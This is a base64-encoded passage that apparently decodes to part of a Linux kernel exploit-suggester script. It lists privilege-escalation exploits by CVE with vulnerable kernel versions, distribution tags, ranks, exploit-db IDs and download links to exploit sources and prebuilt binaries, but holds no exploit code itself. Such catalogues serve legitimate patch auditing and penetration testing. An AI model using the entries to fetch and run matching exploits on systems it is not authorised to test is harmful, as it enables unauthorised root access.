2h0dHA6Ly93d3cudnNlY3VyaXR5LmNvbS9kb3dubG9hZC90b29scy9saW51eC1yZHMtZXhwbG9pdC5jCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDE2MDYwMjE5MjY0MS9odHRwczovL3d3dy5rZXJuZWwtZXhwbG9pdHMuY29tL21lZGlhL3JkcwpiaW4tdXJsOiBodHRwczovL3dlYi5hcmNoaXZlLm9yZy93ZWIvMjAxNjA2MDIxOTI2NDEvaHR0cHM6Ly93d3cua2VybmVsLWV4cGxvaXRzLmNvbS9tZWRpYS9yZHM2NApleHBsb2l0LWRiOiAxNTI4NQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDEwLTM4NDgsQ1ZFLTIwMTAtMzg1MCxDVkUtMjAxMC00MDczXSR7dHh0cnN0fSBoYWxmX25lbHNvbgpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjAsdmVyPD0yLjYuMzYKVGFnczogdWJ1bnR1PSgxMC4wNHw5LjEwKXtrZXJuZWw6Mi42LigzMXwzMiktKDE0fDIxKS1zZXJ2ZXJ9ClJhbms6IDEKYmluLXVybDogaHR0cDovL3dlYi5hcmNoaXZlLm9yZy93ZWIvMjAxNjA2MDIxOTI2MzEvaHR0cHM6Ly93d3cua2VybmVsLWV4cGxvaXRzLmNvbS9tZWRpYS9oYWxmLW5lbHNvbjMKZXhwbG9pdC1kYjogMTc3ODcKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtOL0FdJHt0eHRyc3R9IGNhcHNfdG9fcm9vdApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjM0LHZlcjw9Mi42LjM2LHg4NgpUYWdzOiB1YnVudHU9MTAuMTAKUmFuazogMQpleHBsb2l0LWRiOiAxNTkxNgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W04vQV0ke3R4dHJzdH0gY2Fwc190b19yb290IDIKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4zNCx2ZXI8PTIuNi4zNgpUYWdzOiB1YnVudHU9MTAuMTAKUmFuazogMQpleHBsb2l0LWRiOiAxNTk0NApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDEwLTQzNDddJHt0eHRyc3R9IGFtZXJpY2FuLXNpZ24tbGFuZ3VhZ2UKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjM2ClRhZ3M6ClJhbms6IDEKZXhwbG9pdC1kYjogMTU3NzQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMC0zNDM3XSR7dHh0cnN0fSBwa3RjZHZkClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4zNgpUYWdzOiB1YnVudHU9MTAuMDQKUmFuazogMQpleHBsb2l0LWRiOiAxNTE1MApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDEwLTMwODFdJHt0eHRyc3R9IHZpZGVvNGxpbnV4ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4zMwpUYWdzOiBSSEVMPTUKUmFuazogMQpleHBsb2l0LWRiOiAxNTAyNApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDEyLTAwNTZdJHt0eHRyc3R9IG1lbW9kaXBwZXIKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTMuMC4wLHZlcjw9My4xLjAKVGFnczogdWJ1bnR1PSgxMC4wNHwxMS4xMCl7a2VybmVsOjMuMC4wLTEyLShnZW5lcmljfHNlcnZlcil9ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdC56eDJjNC5jb20vQ1ZFLTIwMTItMDA1Ni9hYm91dC8Kc3JjLXVybDogaHR0cHM6Ly9naXQuengyYzQuY29tL0NWRS0yMDEyLTAwNTYvcGxhaW4vbWVtcG9kaXBwZXIuYwpiaW4tdXJsOiBodHRwczovL3dlYi5hcmNoaXZlLm9yZy93ZWIvMjAxNjA2MDIxOTI2MzEvaHR0cHM6Ly93d3cua2VybmVsLWV4cGxvaXRzLmNvbS9tZWRpYS9tZW1vZGlwcGVyCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDE2MDYwMjE5MjYzMS9odHRwczovL3d3dy5rZXJuZWwtZXhwbG9pdHMuY29tL21lZGlhL21lbW9kaXBwZXI2NApleHBsb2l0LWRiOiAxODQxMQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDEyLTAwNTYsQ1ZFLTIwMTAtMzg0OSxDVkUtMjAxMC0zODUwXSR7dHh0cnN0fSBmdWxsLW5lbHNvbgpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjAsdmVyPD0yLjYuMzYKVGFnczogdWJ1bnR1PSg5LjEwfDEwLjEwKXtrZXJuZWw6Mi42LigzMXwzNSktKDE0fDE5KS0oc2VydmVyfGdlbmVyaWMpfSx1YnVudHU9MTAuMDR7a2VybmVsOjIuNi4zMi0oMjF8MjQpLXNlcnZlcn0KUmFuazogMQpzcmMtdXJsOiBodHRwOi8vdnVsbmZhY3Rvcnkub3JnL2V4cGxvaXRzL2Z1bGwtbmVsc29uLmMKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvZnVsbC1uZWxzb24KYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvZnVsbC1uZWxzb242NApleHBsb2l0LWRiOiAxNTcwNApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDEzLTE4NThdJHt0eHRyc3R9IENMT05FX05FV1VTRVJ8Q0xPTkVfRlMKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI9My44LENPTkZJR19VU0VSX05TPXkKVGFnczogClJhbms6IDEKc3JjLXVybDogaHR0cDovL3N0ZWFsdGgub3BlbndhbGwubmV0L3hTcG9ydHMvY2xvd24tbmV3dXNlci5jCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9sd24ubmV0L0FydGljbGVzLzU0MzI3My8KZXhwbG9pdC1kYjogMzgzOTAKYXV0aG9yOiBTZWJhc3RpYW4gS3JhaG1lcgpDb21tZW50czogQ09ORklHX1VTRVJfTlMgbmVlZHMgdG8gYmUgZW5hYmxlZCAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMy0yMDk0XSR7dHh0cnN0fSBwZXJmX3N3ZXZlbnQKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4zMix2ZXI8My44LjkseDg2XzY0ClRhZ3M6IFJIRUw9Nix1YnVudHU9MTIuMDR7a2VybmVsOjMuMi4wLSgyM3wyOSktZ2VuZXJpY30sZmVkb3JhPTE2e2tlcm5lbDozLjEuMC03LmZjMTYueDg2XzY0fSxmZWRvcmE9MTd7a2VybmVsOjMuMy40LTUuZmMxNy54ODZfNjR9LGRlYmlhbj03e2tlcm5lbDozLjIuMC00LWFtZDY0fQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3RpbWV0b2JsZWVkLmNvbS9hLWNsb3Nlci1sb29rLWF0LWEtcmVjZW50LXByaXZpbGVnZS1lc2NhbGF0aW9uLWJ1Zy1pbi1saW51eC1jdmUtMjAxMy0yMDk0LwpiaW4tdXJsOiBodHRwczovL3dlYi5hcmNoaXZlLm9yZy93ZWIvMjAxNjA2MDIxOTI2MzEvaHR0cHM6Ly93d3cua2VybmVsLWV4cGxvaXRzLmNvbS9tZWRpYS9wZXJmX3N3ZXZlbnQKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvcGVyZl9zd2V2ZW50NjQKZXhwbG9pdC1kYjogMjYxMzEKYXV0aG9yOiBBbmRyZWEgJ3NvcmJvJyBCaXR0YXUKQ29tbWVudHM6IE5vIFNNRVAvU01BUCBieXBhc3MKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMy0yMDk0XSR7dHh0cnN0fSBwZXJmX3N3ZXZlbnQgMgpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjMyLHZlcjwzLjguOSx4ODZfNjQKVGFnczogdWJ1bnR1PTEyLjA0e2tlcm5lbDozLigyfDUpLjAtKDIzfDI5KS1nZW5lcmljfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3RpbWV0b2JsZWVkLmNvbS9hLWNsb3Nlci1sb29rLWF0LWEtcmVjZW50LXByaXZpbGVnZS1lc2NhbGF0aW9uLWJ1Zy1pbi1saW51eC1jdmUtMjAxMy0yMDk0LwpzcmMtdXJsOiBodHRwczovL2N5c2VjbGFicy5jb20vZXhwbG9pdHMvdm5pa192MS5jCmV4cGxvaXQtZGI6IDMzNTg5CmF1dGhvcjogVml0YWx5ICd2bmlrJyBOaWtvbGVua28KQ29tbWVudHM6IE5vIFNNRVAvU01BUCBieXBhc3MKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMy0wMjY4XSR7dHh0cnN0fSBtc3IKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4xOCx2ZXI8My43LjYKVGFnczogClJhbms6IDEKZXhwbG9pdC1kYjogMjcyOTcKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMy0xOTU5XSR7dHh0cnN0fSB1c2VybnNfcm9vdF9zcGxvaXQKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTMuMC4xLHZlcjwzLjguOQpUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDEzLzA0LzI5LzEKZXhwbG9pdC1kYjogMjU0NTAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMy0yMDk0XSR7dHh0cnN0fSBzZW10ZXgKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4zMix2ZXI8My44LjkKVGFnczogUkhFTD02ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vdGltZXRvYmxlZWQuY29tL2EtY2xvc2VyLWxvb2stYXQtYS1yZWNlbnQtcHJpdmlsZWdlLWVzY2FsYXRpb24tYnVnLWluLWxpbnV4LWN2ZS0yMDEzLTIwOTQvCmV4cGxvaXQtZGI6IDI1NDQ0CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTQtMDAzOF0ke3R4dHJzdH0gdGltZW91dHB3bgpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My40LjAsdmVyPD0zLjEzLjEsQ09ORklHX1g4Nl9YMzI9eQpUYWdzOiB1YnVudHU9MTMuMTAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9ibG9nLmluY2x1ZGVzZWN1cml0eS5jb20vMjAxNC8wMy9leHBsb2l0LUNWRS0yMDE0LTAwMzgteDMyLXJlY3ZtbXNnLWtlcm5lbC12dWxuZXJhYmxpdHkuaHRtbApiaW4tdXJsOiBodHRwczovL3dlYi5hcmNoaXZlLm9yZy93ZWIvMjAxNjA2MDIxOTI2MzEvaHR0cHM6Ly93d3cua2VybmVsLWV4cGxvaXRzLmNvbS9tZWRpYS90aW1lb3V0cHduNjQKZXhwbG9pdC1kYjogMzEzNDYKQ29tbWVudHM6IENPTkZJR19YODZfWDMyIG5lZWRzIHRvIGJlIGVuYWJsZWQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNC0wMDM4XSR7dHh0cnN0fSB0aW1lb3V0cHduIDIKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTMuNC4wLHZlcjw9My4xMy4xLENPTkZJR19YODZfWDMyPXkKVGFnczogdWJ1bnR1PSgxMy4wNHwxMy4xMCl7a2VybmVsOjMuKDh8MTEpLjAtKDEyfDE1fDE5KS1nZW5lcmljfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2Jsb2cuaW5jbHVkZXNlY3VyaXR5LmNvbS8yMDE0LzAzL2V4cGxvaXQtQ1ZFLTIwMTQtMDAzOC14MzItcmVjdm1tc2cta2VybmVsLXZ1bG5lcmFibGl0eS5odG1sCmV4cGxvaXQtZGI6IDMxMzQ3CkNvbW1lbnRzOiBDT05GSUdfWDg2X1gzMiBuZWVkcyB0byBiZSBlbmFibGVkCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTQtMDE5Nl0ke3R4dHJzdH0gcmF3bW9kZVBUWQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjMxLHZlcjw9My4xNC4zClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vYmxvZy5pbmNsdWRlc2VjdXJpdHkuY29tLzIwMTQvMDYvZXhwbG9pdC13YWxrdGhyb3VnaC1jdmUtMjAxNC0wMTk2LXB0eS1rZXJuZWwtcmFjZS1jb25kaXRpb24uaHRtbApleHBsb2l0LWRiOiAzMzUxNgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE0LTI4NTFdJHt0eHRyc3R9IHVzZS1hZnRlci1mcmVlIGluIHBpbmdfaW5pdF9zb2NrKCkgJHtibGRibHV9KERvUykke3R4dHJzdH0KUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTMuMC4xLHZlcjw9My4xNApUYWdzOiAKUmFuazogMAphbmFseXNpcy11cmw6IGh0dHBzOi8vY3lzZWNsYWJzLmNvbS9wYWdlP249MDIwMTIwMTYKZXhwbG9pdC1kYjogMzI5MjYKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNC00MDE0XSR7dHh0cnN0fSBpbm9kZV9jYXBhYmxlClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMSx2ZXI8PTMuMTMKVGFnczogdWJ1bnR1PTEyLjA0ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vd3d3Lm9wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxNC8wNi8xMC80CmV4cGxvaXQtZGI6IDMzODI0CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTQtNDY5OV0ke3R4dHJzdH0gcHRyYWNlL3N5c3JldApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4wLjEsdmVyPD0zLjgKVGFnczogdWJ1bnR1PTEyLjA0ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vd3d3Lm9wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxNC8wNy8wOC8xNgpleHBsb2l0LWRiOiAzNDEzNApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE0LTQ5NDNdJHt0eHRyc3R9IFBQUG9MMlRQICR7YmxkYmx1fShEb1MpJHt0eHRyc3R9ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjIsdmVyPD0zLjE1LjYKVGFnczogClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2N5c2VjbGFicy5jb20vcGFnZT9uPTAxMTAyMDE1CmV4cGxvaXQtZGI6IDM2MjY3CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTQtNTIwN10ke3R4dHJzdH0gZnVzZV9zdWlkClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMSx2ZXI8PTMuMTYuMQpUYWdzOiAKUmFuazogMQpleHBsb2l0LWRiOiAzNDkyMwpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTkzMjJdJHt0eHRyc3R9IEJhZElSRVQKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTMuMC4xLHZlcjwzLjE3LjUseDg2XzY0ClRhZ3M6IFJIRUw8PTcsZmVkb3JhPTIwClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vbGFicy5icm9taXVtLmNvbS8yMDE1LzAyLzAyL2V4cGxvaXRpbmctYmFkaXJldC12dWxuZXJhYmlsaXR5LWN2ZS0yMDE0LTkzMjItbGludXgta2VybmVsLXByaXZpbGVnZS1lc2NhbGF0aW9uLwpzcmMtdXJsOiBodHRwOi8vc2l0ZS5waTMuY29tLnBsL2V4cC9wX2N2ZS0yMDE0LTkzMjIudGFyLmd6CmV4cGxvaXQtZGI6CmF1dGhvcjogUmFmYWwgJ24zcmdhbCcgV29qdGN6dWsgJiBBZGFtICdwaTMnIFphYnJvY2tpCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTUtMzI5MF0ke3R4dHJzdH0gZXNwZml4NjRfTk1JClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjEzLHZlcjw0LjEuNix4ODZfNjQKVGFnczogClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vd3d3Lm9wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxNS8wOC8wNC84CmV4cGxvaXQtZGI6IDM3NzIyCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bTi9BXSR7dHh0cnN0fSBibHVldG9vdGgKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI8PTIuNi4xMQpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDQ3NTYKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0xMzI4XSR7dHh0cnN0fSBvdmVybGF5ZnMKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTMuMTMuMCx2ZXI8PTMuMTkuMApUYWdzOiB1YnVudHU9KDEyLjA0fDE0LjA0KXtrZXJuZWw6My4xMy4wLSgyfDN8NHw1KSotZ2VuZXJpY30sdWJ1bnR1PSgxNC4xMHwxNS4wNCl7a2VybmVsOjMuKDEzfDE2KS4wLSotZ2VuZXJpY30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9zZWNsaXN0cy5vcmcvb3NzLXNlYy8yMDE1L3EyLzcxNwpiaW4tdXJsOiBodHRwczovL3dlYi5hcmNoaXZlLm9yZy93ZWIvMjAxNjA2MDIxOTI2MzEvaHR0cHM6Ly93d3cua2VybmVsLWV4cGxvaXRzLmNvbS9tZWRpYS9vZnNfMzIKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvb2ZzXzY0CmV4cGxvaXQtZGI6IDM3MjkyCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTUtODY2MF0ke3R4dHJzdH0gb3ZlcmxheWZzIChvdmxfc2V0YXR0cikKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTMuMC4wLHZlcjw9NC4zLjMKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cuaGFsZmRvZy5uZXQvU2VjdXJpdHkvMjAxNS9Vc2VyTmFtZXNwYWNlT3ZlcmxheWZzU2V0dWlkV3JpdGVFeGVjLwpleHBsb2l0LWRiOiAzOTIzMApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTg2NjBdJHt0eHRyc3R9IG92ZXJsYXlmcyAob3ZsX3NldGF0dHIpClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMCx2ZXI8PTQuMy4zClRhZ3M6IHVidW50dT0oMTQuMDR8MTUuMTApe2tlcm5lbDo0LjIuMC0oMTh8MTl8MjB8MjF8MjIpLWdlbmVyaWN9ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vd3d3LmhhbGZkb2cubmV0L1NlY3VyaXR5LzIwMTUvVXNlck5hbWVzcGFjZU92ZXJsYXlmc1NldHVpZFdyaXRlRXhlYy8KZXhwbG9pdC1kYjogMzkxNjYKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi0wNzI4XSR7dHh0cnN0fSBrZXlyaW5nClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjEwLHZlcjw0LjQuMQpUYWdzOgpSYW5rOiAwCmFuYWx5c2lzLXVybDogaHR0cDovL3BlcmNlcHRpb24tcG9pbnQuaW8vMjAxNi8wMS8xNC9hbmFseXNpcy1hbmQtZXhwbG9pdGF0aW9uLW9mLWEtbGludXgta2VybmVsLXZ1bG5lcmFiaWxpdHktY3ZlLTIwMTYtMDcyOC8KZXhwbG9pdC1kYjogNDAwMDMKQ29tbWVudHM6IEV4cGxvaXQgdGFrZXMgYWJvdXQgfjMwIG1pbnV0ZXMgdG8gcnVuLiBFeHBsb2l0IGlzIG5vdCByZWxpYWJsZSwgc2VlOiBodHRwczovL2N5c2VjbGFicy5jb20vYmxvZy9jdmUtMjAxNi0wNzI4LXBvYy1ub3Qtd29ya2luZwpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTIzODRdJHt0eHRyc3R9IHVzYi1taWRpClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMCx2ZXI8PTQuNC44ClRhZ3M6IHVidW50dT0xNC4wNCxmZWRvcmE9MjIKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8veGFpcnkuZ2l0aHViLmlvL2Jsb2cvMjAxNi9jdmUtMjAxNi0yMzg0CnNyYy11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS94YWlyeS9rZXJuZWwtZXhwbG9pdHMvbWFzdGVyL0NWRS0yMDE2LTIzODQvcG9jLmMKZXhwbG9pdC1kYjogNDE5OTkKQ29tbWVudHM6IFJlcXVpcmVzIGFiaWxpdHkgdG8gcGx1ZyBpbiBhIG1hbGljaW91cyBVU0IgZGV2aWNlIGFuZCB0byBleGVjdXRlIGEgbWFsaWNpb3VzIGJpbmFyeSBhcyBhIG5vbi1wcml2aWxlZ2VkIHVzZXIKYXV0aG9yOiBBbmRyZXkgJ3hhaXJ5JyBLb25vdmFsb3YKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi00OTk3XSR7dHh0cnN0fSB0YXJnZXRfb2Zmc2V0ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj00LjQuMCx2ZXI8PTQuNC4wLGNtZDpncmVwIC1xaSBpcF90YWJsZXMgL3Byb2MvbW9kdWxlcwpUYWdzOiB1YnVudHU9MTYuMDR7a2VybmVsOjQuNC4wLTIxLWdlbmVyaWN9ClJhbms6IDEKc3JjLXVybDogaHR0cHM6Ly9naXRsYWIuY29tL2V4cGxvaXQtZGF0YWJhc2UvZXhwbG9pdGRiLWJpbi1zcGxvaXRzLy0vcmF3L21haW4vYmluLXNwbG9pdHMvNDAwNTMuemlwCkNvbW1lbnRzOiBpcF90YWJsZXMua28gbmVlZHMgdG8gYmUgbG9hZGVkCmV4cGxvaXQtZGI6IDQwMDQ5CmF1dGhvcjogVml0YWx5ICd2bmlrJyBOaWtvbGVua28KRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi00NTU3XSR7dHh0cnN0fSBkb3VibGUtZmRwdXQoKQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49NC40LHZlcjw0LjUuNSxDT05GSUdfQlBGX1NZU0NBTEw9eSxzeXNjdGw6a2VybmVsLnVucHJpdmlsZWdlZF9icGZfZGlzYWJsZWQhPTEKVGFnczogdWJ1bnR1PTE2LjA0e2tlcm5lbDo0LjQuMC0yMS1nZW5lcmljfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9idWdzLmNocm9taXVtLm9yZy9wL3Byb2plY3QtemVyby9pc3N1ZXMvZGV0YWlsP2lkPTgwOApzcmMtdXJsOiBodHRwczovL2dpdGxhYi5jb20vZXhwbG9pdC1kYXRhYmFzZS9leHBsb2l0ZGItYmluLXNwbG9pdHMvLS9yYXcvbWFpbi9iaW4tc3Bsb2l0cy8zOTc3Mi56aXAKQ29tbWVudHM6IENPTkZJR19CUEZfU1lTQ0FMTCBuZWVkcyB0byBiZSBzZXQgJiYga2VybmVsLnVucHJpdmlsZWdlZF9icGZfZGlzYWJsZWQgIT0gMQpleHBsb2l0LWRiOiA0MDc1OQphdXRob3I6IEphbm4gSG9ybgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTUxOTVdJHt0eHRyc3R9IGRpcnR5Y293ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMjIsdmVyPD00LjguMwpUYWdzOiBkZWJpYW49N3w4LFJIRUw9NXtrZXJuZWw6Mi42LigxOHwyNHwzMyktKn0sUkhFTD02e2tlcm5lbDoyLjYuMzItKnwzLigwfDJ8Nnw4fDEwKS4qfDIuNi4zMy45LXJ0MzF9LFJIRUw9N3trZXJuZWw6My4xMC4wLSp8NC4yLjAtMC4yMS5lbDd9LHVidW50dT0xNi4wNHwxNC4wNHwxMi4wNApSYW5rOiA0CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL2RpcnR5Y293L2RpcnR5Y293LmdpdGh1Yi5pby93aWtpL1Z1bG5lcmFiaWxpdHlEZXRhaWxzCkNvbW1lbnRzOiBGb3IgUkhFTC9DZW50T1Mgc2VlIGV4YWN0IHZ1bG5lcmFibGUgdmVyc2lvbnMgaGVyZTogaHR0cHM6Ly9hY2Nlc3MucmVkaGF0LmNvbS9zaXRlcy9kZWZhdWx0L2ZpbGVzL3JoLWN2ZS0yMDE2LTUxOTVfNS5zaApleHBsb2l0LWRiOiA0MDYxMQphdXRob3I6IFBoaWwgT2VzdGVyCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtNTE5NV0ke3R4dHJzdH0gZGlydHljb3cgMgpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjIyLHZlcjw9NC44LjMKVGFnczogZGViaWFuPTd8OCxSSEVMPTV8Nnw3LHVidW50dT0xNC4wNHwxMi4wNCx1YnVudHU9MTAuMDR7a2VybmVsOjIuNi4zMi0yMS1nZW5lcmljfSx1YnVudHU9MTYuMDR7a2VybmVsOjQuNC4wLTIxLWdlbmVyaWN9ClJhbms6IDQKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vZGlydHljb3cvZGlydHljb3cuZ2l0aHViLmlvL3dpa2kvV